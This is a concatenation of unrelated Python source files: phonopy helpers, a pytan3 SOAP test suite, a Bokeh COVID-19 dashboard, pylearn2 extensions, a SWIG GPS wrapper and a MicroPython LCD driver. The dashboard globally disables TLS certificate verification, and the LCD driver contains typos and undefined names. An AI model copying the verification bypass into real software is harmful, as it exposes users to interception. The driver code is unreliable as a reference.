qpoints_list += list(qs[1:])
frequencies_list += list(fs[1:])
else:
labels_list.append((len(qpoints_list) - 1, labels[label_index]))
label_index += 1
if label_index < len(labels):
labels_list.append((len(qpoints_list), labels[label_index]))
label_index += 1
qpoints_list += list(qs)
frequencies_list += list(fs)
labels_list.append((len(qpoints_list) - 1, labels[-1]))
bs = DataFactory('array.bands')()
bs.set_kpoints(np.array(qpoints_list))
bs.set_bands(np.array(frequencies_list), units='THz')
bs.labels = labels_list
if label is not None:
bs.label = label
return bs
def get_phonopy_instance(structure, phonon_settings_dict, params):
from phonopy import Phonopy
phonon = Phonopy(
phonopy_atoms_from_structure(structure),
phonon_settings_dict['supercell_matrix'],
primitive_matrix='auto',
symprec=phonon_settings_dict['symmetry_tolerance'])
if 'nac_params' in params:
from phonopy.interface import get_default_physical_units
units = get_default_physical_units('vasp')
factor = units['nac_factor']
nac_params = {'born': params['nac_params'].get_array('born_charges'),
'dielectric': params['nac_params'].get_array('epsilon'),
'factor': factor}
phonon.set_nac_params(nac_params)
return phonon
def get_primitive(structure, ph_settings):
from phonopy import Phonopy
phonon = Phonopy(
phonopy_atoms_from_structure(structure),
supercell_matrix=ph_settings.get_dict()['supercell_matrix'],
primitive_matrix=ph_settings.get_dict()['primitive_matrix'],
symprec=ph_settings.get_dict()['symmetry_tolerance'])
primitive_phonopy = phonon.get_primitive()
primitive_cell = primitive_phonopy.get_cell()
symbols = primitive_phonopy.get_chemical_symbols()
positions = primitive_phonopy.get_positions()
primitive_structure = DataFactory('structure')(cell=primitive_cell)
for symbol, position in zip(symbols, positions):
primitive_structure.append_atom(position=position, symbols=symbol)
return {'primitive_structure': primitive_structure}
def phonopy_atoms_to_structure(cell):
symbols = cell.get_chemical_symbols()
positions = cell.get_positions()
structure = DataFactory('structure')(cell=cell.get_cell())
for symbol, position in zip(symbols, positions):
structure.append_atom(position=position, symbols=symbol)
return structure
def phonopy_atoms_from_structure(structure):
cell = PhonopyAtoms(symbols=[site.kind_name for site in structure.sites],
positions=[site.position for site in structure.sites],
cell=structure.cell)
return cell
def from_node_id_to_aiida_node_id(node_id):
if type(node_id) is int:
return Int(node_id)
elif type(node_id) is str:
return Str(node_id)
else:
raise RuntimeError("%s is not supported in load_node."
% type(node_id))
|
<reponame>lifehackjim/pytan3<filename>pytan3/tests/test_adapters/test_adapters_all_soap.py
# -*- coding: utf-8 -*-
"""Test suite for pytan3."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pytan3
import pytest
class TestAdaptersAllSoap(object):
"""Test all Adapters of type: soap."""
@pytest.fixture
def adapter(self, adapter_soap, http_client, auth):
"""Get an adapter object of type: soap."""
api_module = adapter_soap["api_module"]
api_client_cls = adapter_soap["api_client"]
adapter_cls = adapter_soap["adapter"]
api_objects = pytan3.api_objects.ApiObjects(
module_file=api_module["module_file"]
)
try:
credentials_auth = pytan3.auth_methods.Credentials(
http_client=http_client, **auth
)
api_client = api_client_cls(
http_client=http_client, auth_method=credentials_auth
)
adapter = adapter_cls(api_client=api_client, api_objects=api_objects)
except pytan3.api.exceptions.VersionMismatchError as exc: # pragma: no cover
m = "Skipping due to version requirement failure: {e}".format(e=exc)
pytest.skip(m)
return adapter
# only SOAP has session returned
def test_missing_session_warns(self, adapter, monkeypatch):
"""Test warn thrown when session element isn't found."""
monkeypatch.setattr("pytan3.adapters.re_soap_tag", "x")
user = adapter.api_objects.User(id=adapter.api_client.auth_method.uid)
with pytest.warns(pytan3.adapters.exceptions.SessionNotFoundWarning):
result = adapter.api_get(user)
user = result()
assert isinstance(result, pytan3.results.Soap)
assert isinstance(user, adapter.api_objects.User)
assert user.id == adapter.api_client.auth_method.uid
assert user.name
# only SOAP allows None for target
def test_get_audit_logs_user_target_none(self, adapter):
"""Test type=user, target=None returns audit logs for all users."""
result = adapter.api_get_audit_logs(type="user", target=None)
logs = result()
assert isinstance(result, pytan3.results.Soap)
assert isinstance(logs, adapter.api_objects.AuditLog)
assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
assert len(logs.entries) > 1
# SOAP and REST disagree on how audit logs should be returned. fun.
def test_get_audit_logs_user_target(self, adapter):
"""Test type=user, target=auth_method.uid returns 1 audit log for 1 user."""
target = adapter.api_client.auth_method.uid
result = adapter.api_get_audit_logs(type="user", target=target)
logs = result()
assert isinstance(result, pytan3.results.Soap)
assert isinstance(logs, adapter.api_objects.AuditLog)
assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
assert len(logs.entries) == 1
def test_get_audit_logs_user_target_count2(self, adapter):
"""Test type=user, target=auth_method.uid, count=2 returns 2 audit log for 1 user."""
target = adapter.api_client.auth_method.uid
result = adapter.api_get_audit_logs(type="user", target=target, count=2)
logs = result()
assert isinstance(result, pytan3.results.Soap)
assert isinstance(logs, adapter.api_objects.AuditLog)
assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
assert len(logs.entries) == 2
def test_get_q_missing_attrs(self, adapter):
"""Test api_get w/ question with no attrs set works."""
result = adapter.api_get(adapter.api_objects.Question())
obj = result()
assert isinstance(result, pytan3.results.Soap)
assert isinstance(obj, adapter.api_objects.QuestionList)
def test_bad_command(self, adapter):
"""Test exc thrown with cmd mismatch."""
result = adapter.api_get(adapter.api_objects.User(id=adapter.auth_method.uid))
obj = result.request_body_obj
path = "soap:Envelope/soap:Body/t:tanium_soap_request"
src = "SOAP API deserialized request body"
request = result.get_dict_path(obj=obj, path=path, src=src)
request["command"] = "badwolf"
with pytest.raises(pytan3.results.exceptions.ResponseError):
result()
|
<reponame>2133649586/Coronavirus-Tracker<gh_stars>0
import ssl
# 全局取消证书验证
ssl._create_default_https_context = ssl._create_unverified_context
import pandas as pd
from bokeh.core.properties import value
from bokeh.layouts import column, row
from bokeh.models import CustomJS, DatePicker, Div, ColumnDataSource, TableColumn, DataTable, HoverTool
from bokeh.plotting import figure, curdoc
total_path = "https://raw.githubusercontent.com/datadesk/california-coronavirus-data/master/cdph-state-totals.csv"
race_path = "https://raw.githubusercontent.com/datadesk/california-coronavirus-data/master/cdph-race-ethnicity.csv"
total_data = pd.read_csv(total_path)
race_data = pd.read_csv(race_path)
last_update_date = total_data["date"][0]
# to represent the source of data
introduce_of_data = Div(text = """all of the data we used in this visualization project is published by the California \
Department of Public Health, and we get the dataset with url from github repository : https://github.com/datadesk/california-coronavirus-data.
<b>Last update date: {}<b>""".format(last_update_date), width = 700, height= 80 )
# design date select options
date_picker = DatePicker(title='Select date', value="2020-08-11", min_date="2020-06-25", max_date=last_update_date)
selected_date = date_picker.value
# question a
increase_case = {"date":[selected_date],"confirm case":[]}
for i in range(len(total_data["date"])-1):
if total_data["date"][i] == selected_date:
increase_case["confirm case"].append(total_data["confirmed_cases"][i] - total_data["confirmed_cases"][i+1])
source_q1 = ColumnDataSource(increase_case)
columns1 = [TableColumn(field="date", title="Date"),TableColumn(field="confirm case", title="Increase confirm case")]
data_table1 = DataTable(source = source_q1, columns=columns1, width=400, height=120)
#question b,c
description = Div(text = """we can get answer of second and third question here, 2.For a particular day, what is the %percent cases by race compared to their representation in the
general population? 3.For a particular day, what is the %percent deaths by race compared to their representation in the
general population? And when you move mouse to certain area, the detail of parameter will displayed in right box. <b>Attention: if there is no any data in table or figure
, that means the search date is not exist in our data<b>""")
some = race_data[(race_data["age"]=="all") & (race_data["date"]==selected_date)]
particular_column = ["date","race","confirmed_cases_percent","deaths_percent","population_percent"]
particular_data = some[particular_column]
source_q23 = ColumnDataSource(data = particular_data)
columns23 = [TableColumn(field="date", title="Date"),TableColumn(field="race", title="Race"),
TableColumn(field="confirmed_cases_percent", title="Confirmed cases percent")
,TableColumn(field="deaths_percent", title="Deaths percent"),TableColumn(field="population_percent", title="Population percent")]
data_table23 = DataTable(source = source_q23, columns=columns23, width=800, height=280)
# 创建数据
colors = ["#c9d9d3", "#718dbf", "#e84d60"]
para_column = ["confirmed_cases_percent","deaths_percent","population_percent"]
p = figure(x_range=particular_data["race"], plot_height=350, title="",tools="")
renderers = p.vbar_stack(para_column, #可以用years代替,就是上边设置的变量 # 设置堆叠值,这里source中包含了不同年份的值,years变量用于识别不同堆叠层
x='race', # 设置x坐标
source=source_q23, #包含了2015/2016/2017的数据的; 主要设置的就是这3个参数
width=0.9, color=colors,
legend=[value(x) for x in para_column], name=para_column) #对整个数据做一个分组集合变成一个列表
# 绘制堆叠图
# 注意第一个参数需要放years
h = HoverTool(
tooltips=[('confirmed cases percent %', '@confirmed_cases_percent'), ('deaths cases percent %', '@deaths_percent'), ('population percent %', '@population_percent')])
p.add_tools(h)
p.xgrid.grid_line_color = None
p.axis.minor_tick_line_color = None
p.outline_line_color = None
p.legend.location = "top_left"
p.legend.orientation = "horizontal"
# 设置其他参数
def call_back(attr, old, new):
# question a
global selected_date
selected_date = date_picker.value
increase_case = {"date": [selected_date], "confirm case": []}
for i in range(len(total_data["date"]) - 1):
if total_data["date"][i] == selected_date:
increase_case["confirm case"].append(
total_data["confirmed_cases"][i] - total_data["confirmed_cases"][i + 1])
source_q1.data = increase_case
# question b,c
some = race_data[(race_data["age"] == "all") & (race_data["date"] == selected_date)]
particular_column = ["date", "race", "confirmed_cases_percent", "deaths_percent", "population_percent"]
particular_data = some[particular_column]
source_q23.data = particular_data
date_picker.on_change("value", call_back)
q1 = column(introduce_of_data,date_picker,data_table1)
q23 = column(description,p)
#show(column(q1,q23))
curdoc().add_root(column(q1,column(data_table23,q23)))
|
<reponame>burgerdev/hostload
"""
Extensions for pylearn2 training algorithms. Those are either reimplemented to
suit the execution model of this package, or new ones for recording metrics.
"""
import os
import cPickle as pkl
import numpy as np
from pylearn2.train_extensions import TrainExtension
from .abcs import Buildable
class BuildableTrainExtension(TrainExtension, Buildable):
"""
makes a pylearn2 TrainExtension buildable
"""
@classmethod
def build(cls, config, parent=None, graph=None, workingdir=None):
"""
build an instance of this class with given configuration dict
"""
config_copy = config.copy()
if "wd" not in config_copy:
config_copy["wd"] = workingdir
obj = super(BuildableTrainExtension, cls).build(config_copy)
return obj
def __init__(self, **kwargs):
if "workingdir" in kwargs:
self._wd = kwargs["workingdir"]
super(BuildableTrainExtension, self).__init__()
@classmethod
def get_default_config(cls):
"""
override to provide your own default configuration
"""
conf = super(BuildableTrainExtension, cls).get_default_config()
conf["wd"] = None
return conf
class PersistentTrainExtension(BuildableTrainExtension):
"""
abstract extension that can store its results (on disk, probably)
"""
def store(self):
"""
store the findings of this extension
"""
pass
class WeightKeeper(PersistentTrainExtension):
"""
keeps track of the model's weights at each monitor step
This model stores weights *per monitor step* - the list grows large pretty
quickly.
"""
_weights = []
def on_monitor(self, model, dataset, algorithm):
"""
save the model's weights
"""
self._weights.append(model.get_param_values())
def setup(self, model, dataset, algorithm):
"""
initialize the weight list
"""
self._weights = []
def get_weights(self):
"""
get weights history
"""
return self._weights
def store(self):
path = os.path.join(self._wd, "weightkeeper.pkl")
with open(path, "w") as file_:
pkl.dump(self._weights, file_)
class ProgressMonitor(PersistentTrainExtension):
"""
Makes the monitor channel's history accessible to us.
"""
_progress = np.NaN
@classmethod
def get_default_config(cls):
config = super(ProgressMonitor, cls).get_default_config()
config["channel"] = "valid_objective"
return config
def on_monitor(self, model, dataset, algorithm):
"""
save the desired channel
"""
monitor = model.monitor
channels = monitor.channels
channel = channels[self._channel]
self._progress = channel.val_record
def get_progress(self):
"""
get the value's history
"""
return self._progress
def store(self):
filename = "progress_{}.pkl".format(self._channel)
path = os.path.join(self._wd, filename)
with open(path, "w") as file_:
pkl.dump(self._progress, file_)
class MonitorBasedSaveBest(BuildableTrainExtension):
"""
similar to pylearn2's MonitorBasedSaveBest, but avoids memory hogging
(see https://github.com/lisa-lab/pylearn2/issues/1567)
"""
best_cost = np.inf
best_params = None
@classmethod
def get_default_config(cls):
config = super(MonitorBasedSaveBest, cls).get_default_config()
config["channel"] = "valid_objective"
return config
def setup(self, model, dataset, algorithm):
self.best_cost = np.inf
self.best_params = model.get_param_values()
def on_monitor(self, model, dataset, algorithm):
"""
Looks whether the model performs better than earlier. If it's the
case, saves the model.
Parameters
----------
model : pylearn2.models.model.Model
model.monitor must contain a channel with name given by
self.channel_name
dataset : pylearn2.datasets.dataset.Dataset
Not used
algorithm : TrainingAlgorithm
Not used
"""
monitor = model.monitor
channels = monitor.channels
channel = channels[self._channel]
val_record = channel.val_record
new_cost = val_record[-1]
if new_cost < self.best_cost:
self.best_cost = new_cost
self.best_params = model.get_param_values()
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _gps
else:
import _gps
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
def set_instance_attr(self, name, value):
if name == "thisown":
self.this.own(value)
elif name == "this":
set(self, name, value)
elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
set(self, name, value)
else:
raise AttributeError("You cannot add instance attributes to %s" % self)
return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
def set_class_attr(cls, name, value):
if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
set(cls, name, value)
else:
raise AttributeError("You cannot add class attributes to %s" % cls)
return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
"""Meta class to enforce nondynamic attributes (no new attributes) for a class"""
__setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
def gps_init(ip, port):
return _gps.gps_init(ip, port)
def gps_finish():
return _gps.gps_finish()
def setup_socket():
return _gps.setup_socket()
def close_socket():
return _gps.close_socket()
def get_longitude():
return _gps.get_longitude()
def get_latitude():
return _gps.get_latitude()
def socket_read(buff, n, context):
return _gps.socket_read(buff, n, context)
def gps_thread():
return _gps.gps_thread()
def sbp_pos_llh_callback(sender_id, len, msg, context):
return _gps.sbp_pos_llh_callback(sender_id, len, msg, context)
def sbp_baseline_ned_callback(sender_id, len, msg, context):
return _gps.sbp_baseline_ned_callback(sender_id, len, msg, context)
def sbp_vel_ned_callback(sender_id, len, msg, context):
return _gps.sbp_vel_ned_callback(sender_id, len, msg, context)
def sbp_dops_callback(sender_id, len, msg, context):
return _gps.sbp_dops_callback(sender_id, len, msg, context)
def sbp_gps_time_callback(sender_id, len, msg, context):
return _gps.sbp_gps_time_callback(sender_id, len, msg, context)
def sbp_imu_raw_callback(sender_id, len, msg, context):
return _gps.sbp_imu_raw_callback(sender_id, len, msg, context)
cvar = _gps.cvar
|
# The MIT License (MIT)
# Copyright (c) 2016. <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# DESCRIPTION:
#
# lcd.py - contains ILI TFT LCD controllers driving classes
# Data transfer using 4-line Serial protocol (Series II)
# 16-bit RGB Color (R:5-bit; G:6-bit; B:5-bit)
# About 30Hz monocolor screen refresh
#
# Default is portrait mode:
# lcd = LCD([ portrait = True ])
# width is 240px
# height is 320px
#
# Setup landscape mode:
# lcd = LCD(portrait = False)
# width is 320px
# height is 240px
#
# Template method for orientation management by Accel:
# Changing mode on the fly by calling:
# lcd.portrait = True [or False]
#
# Users don't need to import fonts, they are imported by the python code
# Avaliable fonts:
# Arrows_15
# Arrows_23
# Vera_10
# Vera_m10
# Arial_14
# Vera_15
# Vera_m15
# VeraMono_15
# VeraMono_m15
# Pitch_m15
# Pitch_m23
# VeraMono_m23
# Heydings_23
# Entypo_13
# Entypo_23
#
# define fonts by typing in string format:
# s = lcd.initCh(color = (R,G,B), font = 'Arial_14', [scale = 1])
#
# You may change string objects font by:
# s.font = 'Arial_14'
#
# printing line:
# s.printLn('Hello, World', x, y, [ scale = 1 ])
#
# Smart label widget:
# lcd.label(x, y, bordercolor, infillcolor, string, strobj = s,
# [ border = 1, width = None, height = None ])
#
# if user defines the dimensions of the widget, micropython will
# compute the string length and will do word wrapping automatically.
import micropython
import os
from array import array
from gc import collect
from math import ceil, cos, radians, sin, trunc
from struct import pack, unpack
from time import sleep
from machine import SPI, Pin
from colors import *
from constants import *
micropython.alloc_emergency_exception_buf(100)
# following 3 variables are constants, using in BaseImages class
imgdir = 'images'
cachedir = 'cache'
imgcachepath = imgdir + '/' + cachedir
#if cachedir not in os.listdir(imgdir):
# try:
# os.mkdir(imgcachepath)
# except OSError:
# pass
class ILI(object):
_curwidth = 240 # Current TFT width
_curheight = 320 # Current TFT height
def __init__(self, cs = '22', dc = '21', rst = None, bl = None,
port = VSPI, baud = DEFAULT_BAUDRATE, portrait = True):
""" Initialize ILI class. """
if cs is None or dc is None:
raise RuntimeError('cs and dc pins must not be None')
if port not in [HSPI, VSPI]:
raise RuntimeError('port must be HSPI or VSPI')
self.csPin = Pin(cs, Pin.OUT)
self.dcPin = Pin(dc, Pin.OUT)
self.rstPin = None
if rst is not None:
self.rstPin = Pin(rst, Pin.OUT)
self.blPin = None
if bl is not None:
self.blPin = Pin(bl, Pin.OUT)
# Backlight On
self.blPin.on()
self.spi = SPI(port, baudrate=rate)
self._portrait = portrait
self.curHeight = TFTHEIGHT
self.curWidth = TFTWIDTH
self.reset()
self.initDisplay()
self._gcCollect()
@micropython.viper
def reset(self):
""" Reset the Screen. """
if self.rstPin is not None: # Reset Pin is Connected to ESP32
self.rstPin.off()
sleep(0.01)
self.rstPin.on()
return
@micropython.viper
def _gcCollect(self):
collect()
@micropython.viper
def setDimensions(self):
if ILI.portrait:
self.curHeight = TFTHEIGHT
self.curWidth = TFTWIDTH
else:
self.curHeight = TFTWIDTH
self.curWidth = TFTHEIGHT
self._graph_orientation()
@micropython.viper
def _initILI(self):
self._write_cmd(LCDOFF) # Display OFF
sleep(0.01)
self._write_cmd(SWRESET) # Software Reset
sleep(0.05)
self._graph_orientation()
self._write_cmd(PTLON) # Partial Mode ON
self._write_cmd(PIXFMT) # Pixel Format Set
#self._write_data(0x66) # 18-Bit/Pixel
self._write_data(0x55) # 16-Bit/Pixel
self._write_cmd(GAMMASET)
self._write_data(0x01)
self._write_cmd(ETMOD) # Entry Mode Set
self._write_data(0x07)
self._write_cmd(SLPOUT) # Exit Sleep Mode
sleep(0.01)
self._write_cmd(LCDON) # Display ON
sleep(0.01)
self._write_cmd(RAMWR)
def _write(self, word, command = True, read = False):
self.csPin.off()
self.dcPin.value(0 if command else 1)
if read:
fmt = '>BI'
data = bytearray(5)
self.spi.write_readinto(pack(fmt, word), data)
self.csPin.on()
return data
self.spi.write(word)
slef.csPin.on()
def _decode_spi_data(self, data):
# For example:
# 1. recieving sets 5 bytes
# 2. first 2 of them are useless (or null bytes)
# 3. and just 3 last of them having a useful data:
# - those 3 bytes are RGB bytes (if we are reading from memory)
# - those 3 bytes have a 7 useful bits (and doesn't matter which color is)
# - we must get from them:
# * just 5 largest bits for R and B colors
# * just 6 largest bits for G color
# next 2 lines sorting useful data
# getting 4 last bytes
data = unpack('<BI', data)[1]
# reversing them
data = pack('>I', data)
# getting just 3 bytes from bytearray as BGR
data = unpack('>3B', data)
# with those 3 assignmentations we sorting useful bits for each color
red = (((data[2]>>2) & 31) << 11)
green = (((data[1]>>1) & 63) << 5)
blue = ((data[0]>>2) & 31)
# setting them to 16 bit color
data = red | green | blue
data = pack('>H', data)
return data
def _write_cmd(self, word, read = False):
data = self._write(word, read = read)
return data
def _write_data(self, word):
self._write(word, command = False)
def _write_words(self, words):
wordL = len(words)
wordL = wordL if wordL > 1 else ""
fmt = '>{0}B'.format(wordL)
words = pack(fmt, *words)
self._write_data(words)
@micropython.viper
def _graph_orientation(self):
self._write_cmd(MADCTL) # Memory Access Control
# Portrait:
# | MY=0 | MX=1 | MV=0 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
# OR Landscape:
# | MY=0 | MX=0 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
data = 0x48 if self._portrait else 0x28
self._write_data(data)
@micropython.viper
def _char_orientation(self):
self._write_cmd(MADCTL) # Memory Access Control
# Portrait:
# | MY=1 | MX=1 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
# OR Landscape:
# | MY=0 | MX=1 | MV=1 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
data = 0xE8 if self._portrait else 0x58
self._write_data(data)
@micropython.viper
def _image_orientation(self):
self._write_cmd(MADCTL) # Memory Access Control
# Portrait:
# | MY=0 | MX=1 | MV=0 | ML=0 | BGR=1 | MH=0 | 0 | 0 |
# OR Landscape:
# | MY=0 | MX=1 | MV=0 | ML=1 | BGR=1 | MH=0 | 0 | 0 |
data = 0xC8 if self._portrait else 0x68
self._write_data(data)
def _set_window(self, x0, y0, x1, y1):
# Column Address Set
self._write_cmd(CASET)
self._write_words(((x0>>8) & 0xFF, x0 & 0xFF, (y0>>8) & 0xFF, y0 & 0xFF))
# Page Address Set
self._write_cmd(PASET)
self._write_words(((x1>>8) & 0xFF, x1 & 0xFF, (y1>>8) & 0xFF, y1 & 0xFF))
# Memory Write
self._write_cmd(RAMWR)
def _get_Npix_monoword(self, color):
if color == WHITE:
word = 0xFFFF
elif color == BLACK:
word = 0
else:
R, G, B = color
word = (R<<11) | (G<<5) | B
word = pack('>H', word)
return word
def _return_chpos(self, chrwidth, scale):
if chrwidth == 1:
chpos = scale + 1 if scale > 2 else scale - 1
else:
chpos = scale
return chpos
# Method written by MCHobby https://github.com/mchobby
# Transform a RGB888 color to RGB565 color tuple.
def rgbTo565(self, r, g, b):
return (r>>3, g>>2, b>>3)
@property
def portrait(self):
return self._portrait
@portrait.setter
def portrait(self, portr):
if not isinstance(portr, bool):
from exceptions import PortraitBoolError
raise PortraitBoolError
self._portrait = portr
self.setDimensions()
class BaseDraw(ILI):
def _set_ortho_line(self, width, length, color):
pixels = width * (length + 1)
word = self._get_Npix_monoword(color) * pixels
self._write_data(word)
def drawPixel(self, x, y, color):
self._set_window(x, x, y, y)
self._write_data(self._get_Npix_monoword(color))
def drawVline(self, x, y, length, color, width = 1):
if length > self.curHeight: length = self.curHeight
if width > 10: width = 10
self._set_window(x, x + (width - 1), y, y + length - 1)
self._set_ortho_line(width, length, color)
def drawHline(self, x, y, length, color, width = 1):
if length > self.curWidth: length = self.curWidth
if width > 10: width = 10
self._set_window(x, x + length - 1, y, y + (width - 1))
self._set_ortho_line(width, length, color)
# Method written by MCHobby https://github.com/mchobby
# TODO:
# 1. support border > 1
def drawLine(self, x, y, x1, y1, color):
if x == x1:
self.drawVline( x, y if y <= y1 else y1, abs(y1 - y), color )
elif y==y1:
self.drawHline( x if x <= x1 else x1, y, abs(x-x1), color )
else:
# keep positive range for x
if x1 < x:
x, x1 = x1, x
y, y1 = y1, y
r = (y1 - y) / (x1 - x)
# select ratio > 1 for fast drawing (and thin line)
if abs(r) >= 1:
for i in range(x1 - x + 1):
if (i == 0): # always start at a point
self.drawPixel(x + i, trunc(y + (r * i)), color)
else:
# r may be negative when drawing the wrong way > Fix it when drawing
self.drawVline(x + i, trunc(y + (r * i) - r) + (0 if r > 0 else trunc(r)), abs(trunc(r)), color)
else:
# keep positive range for y
if y1 < y:
x, x1 = x1, x
y, y1 = y1, y
# invert the ratio (should be close of r = 1/r)
r = (x1 - x) / (y1 - y)
for i in range(y1 - y + 1):
if (i == 0):
self.drawPixel(trunc(x + (r * i)), y + i, color)
else:
# r may be negative when drawing the wrong way > fix it to draw positive
self.drawHline(trunc(x + (r * i) - r) + (0 if r > 0 else trunc(r)), y + i, abs(trunc(r)), color)
def drawRect(self, x, y, width, height, color, border = 1, infill = None):
if border is None:
border = 0
border = 10 if border > 10 else border
if width > self.curWidth:
width = self.curWidth
if height > self.curHeight:
height = self.curHeight
height = 2 if height < 2 else height
width = 2 if width < 2 else width
self._graph_orientation()
if border > 0:
if border > width // 2:
border = width // 2 - 1
X, Y = x, y
for i in range(2):
Y = y + height - (border - 1) if i == 1 else y
self.drawHline(X, Y, width, color, border)
if border > 1:
Y = y + 1
H = height
else:
Y = y
H = height + 1
X = x + width - (border - 1) if i == 1 else x
self.drawVline(X, Y, H, color, border)
else:
infill = color
if infill:
xsum = x + border
ysum = y + border
dborder = border * 2
self._set_window(xsum, xsum + width - dborder, ysum, ysum + height - dborder)
# if MemoryError, try to set higher portion value
portion = 32
pixels = width * (height // portion + 1)
pixels = pixels if height >= portion else (width * height) // 3 + 1
times = 16 * 2 if height < portion + 1 else portion + 1
self._gcCollect()
word = self._get_Npix_monoword(infill) * pixels
i = 0
while i < (times):
self._write_data(word)
i+=1
self._gcCollect()
def fillMonocolor(self, color, margin = 0):
margin = 80 if margin > 80 else margin
width = self.curWidth - margin * 2
height = self.curHeight - margin * 2
self.drawRect(margin, margin, width, height, color, border = 0)
def _get_x_perimeter_point(self, x, degrees, radius):
sinus = sin(radians(degrees))
x = trunc(x + (radius * sinus))
return x
def _get_y_perimeter_point(self, y, degrees, radius):
cosinus = cos(radians(degrees))
y = ceil(y - (radius * cosinus))
return y
def drawCircle(self, x, y, radius, color, border = 1, degrees = 360, startangle = 0):
border = 5 if border > 5 else border
self._graph_orientation()
# adding startangle to degrees
if startangle > 0:
degrees += startangle
if border > 1:
radius = radius-border // 2
degp = 0.5
quotient = int(divmod(1, degp)[0])
for i in range(startangle, degrees):
for j in tuple(i + degp * j for j in range(1, quotient + 1)):
X = self._get_x_perimeter_point(x + degp, j, radius)
Y = self._get_y_perimeter_point(y + degp, j, radius)
self.drawHline(X, Y, border, color, border)
def drawCircleFilled(self, x, y, radius, color):
tempY = 0
self._graph_orientation()
for i in range(180):
xNeg = self._get_x_perimeter_point(x, 360 - i, radius - 1)
xPos = self._get_x_perimeter_point(x, i, radius)
if i > 89:
Y = self._get_y_perimeter_point(y, i, radius - 1)
else:
Y = self._get_y_perimeter_point(y, i, radius + 1)
if i == 90: xPos = xPos - 1
if tempY != Y and tempY > 0:
length = xPos + 1
self.drawHline(xNeg, Y, length - xNeg, color, width = 4)
tempY = Y
def drawOvalFilled(self, x, y, xradius, yradius, color):
tempY = 0
self._graph_orientation()
for i in range(180):
xNeg = self._get_x_perimeter_point(x, 360 - i, xradius)
xPos = self._get_x_perimeter_point(x, i, xradius)
Y = self._get_y_perimeter_point(y, i, yradius)
if i > 89: Y = Y - 1
if tempY != Y and tempY > 0:
length = xPos + 1
self.drawHline(xNeg, Y, length - xNeg, color, width = 4)
tempY = Y
class BaseChars(ILI, BaseDraw):
def __init__(self, color = BLACK, font = None, bgcolor = None, scale = 1, **kwargs):
super(BaseChars, self).__init__(**kwargs)
self.fontColor = color
if font is not None:
import fonts
self._gcCollect()
font = fonts.importing(font)
self._font = font
del(fonts)
else:
from exceptions import NoneTypeFont
raise NoneTypeFont
self.bgcolor = bgcolor if bgcolor is None else self._get_Npix_monoword(bgcolor)
self._fontscale = scale
@staticmethod
@micropython.asm_thumb
def _asm_get_charpos(r0, r1, r2):
mul(r0, r1)
adc(r0, r2)
@micropython.viper
def _get_bgcolor(self, x, y):
self._set_window(x, x, y, y)
data = self._write_cmd(RAMRD, read = True)
data = self._decode_recv_data(data)
return data
def _set_word_length(self, data):
return bin(data)[3:] * self.fontscale
def _fill_bicolor(self, data, x, y, width, height, scale=None):
bgcolor = self._get_bgcolor(x, y) if not self.bgcolor else self.bgcolor
color = self.fontColor
self._set_window(x, x + (height * scale) - 1, y, y + (width * scale))
bgpixel = bgcolor * scale
pixel = self._get_Npix_monoword(color) * scale
words = ''.join(map(self._set_word_length, data))
self._gcCollect()
words = bytes(words, 'ascii').replace(b'0', bgpixel).replace(b'1', pixel)
self._write_data(words)
self._graph_orientation()
def printChar(self, char, x, y, scale = None):
if scale is None:
scale = self.fontscale
font = self._font
self.fontscale = scale = 5 if scale >= 5 else scale
index = ord(char)
height = font['height']
try:
chrwidth = len(font[index]) * scale
data = font[index]
except KeyError:
data = None
chrwidth = font['width'] * scale
X = self.curHeight - y - (height * scale) + scale
Y = x
self._char_orientation()
self._gcCollect()
if data is None:
self._graph_orientation()
self.drawRect(x, y, height, chrwidth, self.fontColor, border = 2 * scale)
else:
self._fill_bicolor(data, X, Y, chrwidth, height, scale = scale)
def printLn(self, string, x, y, bc = False, scale = None, strlen = None):
if scale is None:
